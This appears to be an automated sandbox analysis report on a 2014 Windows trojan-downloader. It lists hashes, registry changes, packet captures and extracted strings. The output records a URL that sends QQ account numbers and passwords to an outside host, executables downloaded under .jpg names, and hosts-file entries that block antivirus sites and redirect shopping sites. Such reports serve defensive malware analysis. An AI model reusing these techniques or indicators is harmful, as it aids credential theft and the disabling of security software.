Analysis Date2014-08-29 03:10:52
MD54455b23accfeedf6eaa29748ee69ad57
SHA1cd72e0b7dcd3bc39888cf10724e985696219c589

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 05d6777493c0dd512522fdc798aa2d0a sha1: 391c874311c18f1d665cb5ee4c4dff7f805a3507 size: 221184
Section.rdata md5: 10602b53e34e2052f6673533bb0883ba sha1: 788eaa87c013103e46817b59b708c6228563c202 size: 24576
Section.data md5: b21b39ba2f7fcd062f8ddf18a2b779df sha1: 2fe7eb19b9ad3144805a74480fe874aba8f6536c size: 135168
Timestamp2014-08-23 14:20:12
PackerMicrosoft Visual C++ v6.0
PEhash5a581cf5311060d0a5557679f63885e2975692a0
IMPhash4cf7b7ee19eb993a8daf341fa24c66ed

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page ➝
http://www.duba.com/?un_2_445816\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue ➝
NULL
Creates FileC:\WINDOWS\system32\drivers\etc\hosts
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSwww.qq.com
Winsock URLhttp://www.114lax.com/xin3/mail.asp?qqnumber=&qqpassword= 6

Network Details:

DNSa1574.b.akamai.net
Type: A
184.51.115.19
DNSa1574.b.akamai.net
Type: A
184.51.115.18
DNSwww.soso56.com
Type: A
219.235.1.101
DNSimg.freep.cn
Type: A
221.234.42.184
DNSimg.freep.cn
Type: A
221.234.36.242
DNSimg.freep.cn
Type: A
221.234.42.16
DNSimg.freep.cn
Type: A
221.234.42.16
DNSimg.freep.cn
Type: A
221.234.42.184
DNSimg.freep.cn
Type: A
221.234.36.242
DNSdownload.2345.com
Type: A
61.147.127.202
DNSdownload.2345.com
Type: A
61.147.127.203
DNSdownload.2345.com
Type: A
61.160.245.8
DNSdownload.2345.com
Type: A
61.160.245.11
DNSdownload.2345.com
Type: A
61.160.245.14
DNSdownload.2345.com
Type: A
122.228.248.3
DNSdownload.2345.com
Type: A
218.75.155.244
DNSdownload.2345.com
Type: A
60.191.187.15
DNSdownload.2345.com
Type: A
60.191.223.2
DNSdownload.2345.com
Type: A
60.191.223.4
DNSdownload.2345.com
Type: A
60.191.223.15
DNSwangyunfei.web7s.pcxue.net
Type: A
14.102.249.13
DNSwww.qq.com
Type: A
DNSd3.freep.cn
Type: A
DNSd2.freep.cn
Type: A
DNSjifendownload.2345.cn
Type: A
DNSwww.114lax.com
Type: A
HTTP GEThttp://www.soso56.com/asdqw_3104-48740.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d3.freep.cn/3tb_140818092254lkmy537913.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d3.freep.cn/3tb_1408220915588uva538112.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d2.freep.cn/3tb_140822092250fy1p538112.jpg
User-Agent: DownJet1.0
HTTP GEThttp://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
User-Agent: DownJet1.0
HTTP GEThttp://d3.freep.cn/3tb_140822173106dyxl538112.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d2.freep.cn/3tb_140822174145xr9r538112.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d3.freep.cn/3tb_140822172706ahch538112.jpg
User-Agent: DownJet1.0
HTTP GEThttp://d2.freep.cn/3tb_140810210616ab0y536124.jpg
User-Agent: DownJet1.0
HTTP GEThttp://www.114lax.com/xin3/mail.asp?qqnumber=&qqpassword=%20%206
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Flows TCP192.168.1.1:1031 ➝ 184.51.115.19:80
Flows TCP192.168.1.1:1032 ➝ 219.235.1.101:80
Flows TCP192.168.1.1:1033 ➝ 221.234.42.184:80
Flows TCP192.168.1.1:1034 ➝ 221.234.42.184:80
Flows TCP192.168.1.1:1035 ➝ 221.234.42.16:80
Flows TCP192.168.1.1:1036 ➝ 61.147.127.202:80
Flows TCP192.168.1.1:1037 ➝ 221.234.42.184:80
Flows TCP192.168.1.1:1038 ➝ 221.234.42.16:80
Flows TCP192.168.1.1:1039 ➝ 221.234.42.184:80
Flows TCP192.168.1.1:1040 ➝ 221.234.42.16:80
Flows TCP192.168.1.1:1041 ➝ 14.102.249.13:80

Raw Pcap
0x00000000 (00000)   47455420 2f617364 71775f33 3130342d   GET /asdqw_3104-
0x00000010 (00016)   34383734 302e6a70 67204854 54502f31   48740.jpg HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a557365 722d4167 656e743a 20446f77   .User-Agent: Dow
0x00000040 (00064)   6e4a6574 312e300d 0a486f73 743a2077   nJet1.0..Host: w
0x00000050 (00080)   77772e73 6f736f35 362e636f 6d0d0a43   ww.soso56.com..C
0x00000060 (00096)   6f6e6e65 6374696f 6e3a2043 6c6f7365   onnection: Close
0x00000070 (00112)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x00000080 (00128)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f337462 5f313430 38313830   GET /3tb_1408180
0x00000010 (00016)   39323235 346c6b6d 79353337 3931332e   92254lkmy537913.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064332e 66726565   0..Host: d3.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f337462 5f313430 38323230   GET /3tb_1408220
0x00000010 (00016)   39313535 38387576 61353338 3131322e   915588uva538112.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064332e 66726565   0..Host: d3.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f337462 5f313430 38323230   GET /3tb_1408220
0x00000010 (00016)   39323235 30667931 70353338 3131322e   92250fy1p538112.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064322e 66726565   0..Host: d2.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f6a6966 656e5f32 3334352f   GET /jifen_2345/
0x00000010 (00016)   70335f6b 62616964 75383838 3838385f   p3_kbaidu888888_
0x00000020 (00032)   6a673034 4f756e6c 46343833 6c5a6174   jg04OunlF483lZat
0x00000030 (00048)   6d364972 355f7631 342e372e 312e6578   m6Ir5_v14.7.1.ex
0x00000040 (00064)   65204854 54502f31 2e310d0a 41636365   e HTTP/1.1..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000060 (00096)   656e743a 20446f77 6e4a6574 312e300d   ent: DownJet1.0.
0x00000070 (00112)   0a486f73 743a206a 6966656e 646f776e   .Host: jifendown
0x00000080 (00128)   6c6f6164 2e323334 352e636e 0d0a436f   load.2345.cn..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20436c 6f73650d   nnection: Close.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f337462 5f313430 38323231   GET /3tb_1408221
0x00000010 (00016)   37333130 36647978 6c353338 3131322e   73106dyxl538112.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064332e 66726565   0..Host: d3.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a 74696f6e 3a20436c 6f73650d   ....tion: Close.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f337462 5f313430 38323231   GET /3tb_1408221
0x00000010 (00016)   37343134 35787239 72353338 3131322e   74145xr9r538112.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064322e 66726565   0..Host: d2.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a 74696f6e 3a20436c 6f73650d   ....tion: Close.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f337462 5f313430 38323231   GET /3tb_1408221
0x00000010 (00016)   37323730 36616863 68353338 3131322e   72706ahch538112.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064332e 66726565   0..Host: d3.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a 74696f6e 3a20436c 6f73650d   ....tion: Close.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f337462 5f313430 38313032   GET /3tb_1408102
0x00000010 (00016)   31303631 36616230 79353336 3132342e   10616ab0y536124.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a4163   jpg HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000040 (00064)   4167656e 743a2044 6f776e4a 6574312e   Agent: DownJet1.
0x00000050 (00080)   300d0a48 6f73743a 2064322e 66726565   0..Host: d2.free
0x00000060 (00096)   702e636e 0d0a436f 6e6e6563 74696f6e   p.cn..Connection
0x00000070 (00112)   3a20436c 6f73650d 0a436163 68652d43   : Close..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a 74696f6e 3a20436c 6f73650d   ....tion: Close.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f78696e 332f6d61 696c2e61   GET /xin3/mail.a
0x00000010 (00016)   73703f71 716e756d 6265723d 26717170   sp?qqnumber=&qqp
0x00000020 (00032)   61737377 6f72643d 25323025 32303620   assword=%20%206 
0x00000030 (00048)   48545450 2f312e31 0d0a5573 65722d41   HTTP/1.1..User-A
0x00000040 (00064)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000050 (00080)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000060 (00096)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000070 (00112)   204e5420 352e313b 20535631 290d0a48    NT 5.1; SV1)..H
0x00000080 (00128)   6f73743a 20777777 2e313134 6c61782e   ost: www.114lax.
0x00000090 (00144)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x000000a0 (00160)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a            no-cache....


Strings
\
 \
.00-+ -E-0-0
00...........?-  
0
0 
0
LlE
CC
.
 
..u
  00,69,00,5f,00,36,00,37,00,33,00,33,00,2e,00,65,00,78,00,65,00,22,00,20,00,\
  2d,00,41,00,75,00,74,00,6f,00,52,00,75,00,6e,00,00,00
  5c,00,54,00,69,00,61,00,6e,00,64,00,69,00,5c,00,54,00,69,00,61,00,6e,00,64,\
Cjjj
         (((((                  H
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
(null)
"td"=hex(2):22,00,25,00,41,00,50,00,50,00,44,00,41,00,54,00,41,00,25,00,\
Windows Registry Editor Version 5.00
^,_^][
                          
\....\
"@0123456789ABCDEF
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0SSSSS
0WWWWW
126126126126
127.0.0.1   360.cn
127.0.0.1   bbs.360.cn
127.0.0.1   bbs.duba.net
127.0.0.1   bbs.ikaka.com
127.0.0.1   bbs.janmeng.com
127.0.0.1   bbs.kafan.cn
127.0.0.1   bbs.sanfans.com
127.0.0.1   bbs.sd.keniu.com
127.0.0.1   bbs.shadu007.com
127.0.0.1   bbs.taobao.com
127.0.0.1   bbs.vc52.cn
127.0.0.1   cd001.www.duba.net
127.0.0.1   club.alimama.com
127.0.0.1   forum.taobao.com
127.0.0.1   lt.ijinshan.com
127.0.0.1   taoke.alimama.com
127.0.0.1   www.360.cn
127.0.0.1   www.alimama.com
127.0.0.1   www.ijinshan.com
127.0.0.1   www.kafan.cn
127.0.0.1   www.kpfans.com
127.0.0.1   www.shadu007.coC:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1   www.shadu007.com
127.0.0.1   www.virscan.org
1#QNAN
1#SNAN
219.235.1.101   517xky.webnode.cn
219.235.1.101   bijibendiannao.blog.china.com
219.235.1.101   cpro.baidu.com
219.235.1.101   diannao.nav123.com
219.235.1.101   mall.yi85.com
219.235.1.101   shouji.tbw.net.cn
219.235.1.101   tbwwsgwdn.tao132.cn
219.235.1.101   www.66taoke.com
219.235.1.101   www.77taoba.com
219.235.1.101   www.91kd.cn
219.235.1.101   www.949528.cn
219.235.1.101   www.cntorg.com
219.235.1.101   www.haixitaoke.com
219.235.1.101   www.hl-sms.cn
219.235.1.101   www.lizhishu.com
219.235.1.101   www.mbaobao.com
219.235.1.101   www.mbbw.info
219.235.1.101   www.mvptaoke.com
219.235.1.101   www.nongyecn.com
219.235.1.101   www.pg8.cn
219.235.1.101   www.qiangdiannao.cn
219.235.1.101   www.shopnokia.info
219.235.1.101   www.sjxun.com
219.235.1.101   www.sugouwu.com
219.235.1.101   www.taobao.com
219.235.1.101   www.taobao-mo.com
219.235.1.101   www.taobao-shouji.com
219.235.1.101   www.taok.cc
219.235.1.101   www.taoke.info
219.235.1.101   www.taoke.la
219.235.1.101   www.taokw.com
219.235.1.101   www.ttcome.cn
219.235.1.101   www.ywaili.com
 2345zhen
%2\CLSID
%2\DocObject
%2\Insertable
%2\protocol\StdFileEditing\server
%2\protocol\StdFileEditing\verb\0
   360SE
3F3F6767673E2121247C71683E737F7D3F68797E233F7D71797C3E7163602F61617E657D7275622D8DD8900FB786464602A
.4.7.lnk
4~f9.u
\$4UVW
_7654_356.exe
_7654_5943.exe
%9, %8
9t$dt7
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abnormal program termination
Accept: */*
AdjustWindowRectEx
ADSafe3.lnk
advapi32.dll
Advapi32.dll
ADVAPI32.dll
AfxControlBar42s
AfxFrameOrView42s
AfxMDIFrame42s
AfxOldWndProc423
AfxOleControl42s
AfxWnd42s
   Aguangshushurufazhen
An application has made an attempt to load the C runtime library incorrectly.
AppendMenuA
AsDefault=1
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="2345.com" type="win32"></assemblyIdentity><description>2345.com</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS></application></compatibility></assembly>PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXC:\Program Files\Common Files\Microsoft Shared\autoinstall.exe
AtlAxWinInit
atl.dll
ATL.DLL
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
.?AUCThreadData@@
August
.?AUIMessageFilter@@
.?AUIUnknown@@
.?AV_AFX_BASE_MODULE_STATE@@
.?AV_AFX_CTL3D_STATE@@
.?AV_AFX_CTL3D_THREAD@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_OLE_STATE@@
.?AV_AFX_THREAD_STATE@@
.?AV_AFX_WIN_STATE@@
.?AVbad_alloc@std@@
.?AVbad_exception@std@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCommonDialog@@
.?AVCDC@@
.?AVCDialog@@
.?AVCException@@
.?AVCGdiObject@@
.?AVCHandleMap@@
.?AVCMapPtrToPtr@@
.?AVCMemoryException@@
.?AVCMenu@@
.?AVCNoTrackObject@@
.?AVCNotSupportedException@@
.?AVCObject@@
.?AVCOleBusyDialog@@
.?AVCOleDialog@@
.?AVCOleMessageFilter@@
.?AVCResourceException@@
.?AVCSimpleException@@
.?AVCTempDC@@
.?AVCTempGdiObject@@
.?AVCTempMenu@@
.?AVCTempWnd@@
.?AVCTestCmdUI@@
.?AVCUserException@@
.?AVCWinApp@@
.?AVCWinThread@@
.?AVCWnd@@
.?AVexception@std@@
.?AVlength_error@std@@
.?AVlogic_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
.?AVXMessageFilter@COleMessageFilter@@
bad allocation
bad exception
BaiduAnTray.exe
\BaiduAnUpdate.exe
  baiduSD
BaiduSdTray.exe
\BaiduSdUpdate.exe
   baiduse
  baiduWS
 Base Class Array'
 Base Class Descriptor at (
__based(
BBFFf;
BeginPaint
BitBlt
blackmoon
BlackMoon RunTime Error:
BlueSoftSetup_bsugqr.exe
CallNextHookEx
CallWindowProcA
C:\bdkv_install.log
C:\BlueSoftSetup.log
CCmdTarget
__cdecl
CDialog
C:\Documents and Settings\administrator\
C:\Documents and Settings\Administrator\
C:\Documents and Settings\Administrator\Application Data\360se6\Application\360se.exe
C:\Documents and Settings\Administrator\Application Data\360se6\Application\6.3.1.153\installer\setup.exe
C:\Documents and Settings\Administrator\Local Settings\Application Data\Kingsoft\WPS Office\9.1.0.4463\utility\uninst.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\bluefiles
C:\Documents and Settings\All Users\
C:\DuDu\uninstall.exe
CException
CGdiObject
CheckedValue
CheckMenuItem
CheckMenuRadioItem
Chrome=0
 Class Hierarchy Descriptor'
ClientToScreen
CloseHandle
ClosePrinter
__clrcall
     cls
CLSID\%1
CLSID\%1\AuxUserType\2
CLSID\%1\AuxUserType\3
CLSID\%1\DefaultExtension
CLSID\%1\DefaultIcon
CLSID\%1\DocObject
CLSID\%1\InprocHandler32
CLSID\%1\InProcServer32
CLSID\%1\Insertable
CLSID\%1\LocalServer32
CLSID\%1\MiscStatus
CLSID\%1\Printable
CLSID\%1\ProgID
CLSID\%1\Verb\0
CLSID\%1\Verb\1
CLSIDFromProgID
CLSIDFromString
CMapPtrToPtr
CMemoryException
CNotSupportedException
CObject
CoCreateInstance
CoFreeUnusedLibraries
CoInitialize
COleBusyDialog
COleDialog
CombineRgn
combobox
COMCTL32.dll
COMCTL32.DLL
comdlg32.dll
commctrl_DragListMsg
 Complete Object Locator'
[Config]
Connection: close
CONOUT$
`copy constructor closure'
CopyRect
CoRegisterMessageFilter
CoRevokeClassObject
CorExitProcess
CoUninitialize
C:\Program Files\2345Explorer
C:\Program Files\2345Explorer\Uninstall.exe
C:\Program Files\2345Pic
C:\Program Files\2345Pic\Uninstall.exe
C:\Program Files\91yGame\unins000.exe
C:\Program Files\ADSafe3\ADSafe.exe
C:\Program Files\ADSafe3\uninst.exe
C:\Program Files\ainqngz3.9\uninstall.exe
C:\Program Files\ainqngz4.7\uninstall.exe
C:\Program Files\Baidu\BaiduAn\2.1.0.1154\BaiduAnUpdate.exe
C:\Program Files\baidu\BaiduBrowser\baidubrowser.exe
C:\Program Files\Baidu\BaiduSd\1.8.0.1196\BaiduSdUpdate.exe
C:\Program Files\Baofeng\StormPlayer\Uninst.exe
C:\Program Files\BlueBox
C:\Program Files\BlueBox\uninst.exe
C:\Program Files\Common Files
C:\Program Files\Common Files\
C:\Program Files\Common Files\asdqw_3104-48740.exe
C:\Program Files\Common Files\baidu.exe
C:\Program Files\Common Files\baiduse.exe
C:\Program Files\Common Files\baiduse.jpg
C:\Program Files\Common Files\bdsd_1454_7654_356.exe
C:\Program Files\Common Files\bdsd_1454_7654_5943.exe
C:\Program Files\Common Files\bdsd.exe
C:\Program Files\Common Files\bdsd.jpg
C:\Program Files\Common Files\bdsws.exe
C:\Program Files\Common Files\bdsws.jpg
C:\Program Files\Common Files\bdws_1454_7654_5943.exe
C:\Program Files\Common Files\bdws.exe
C:\Program Files\Common Files\bdws.jpg
C:\Program Files\Common Files\gswb_1454_7654_356.exe
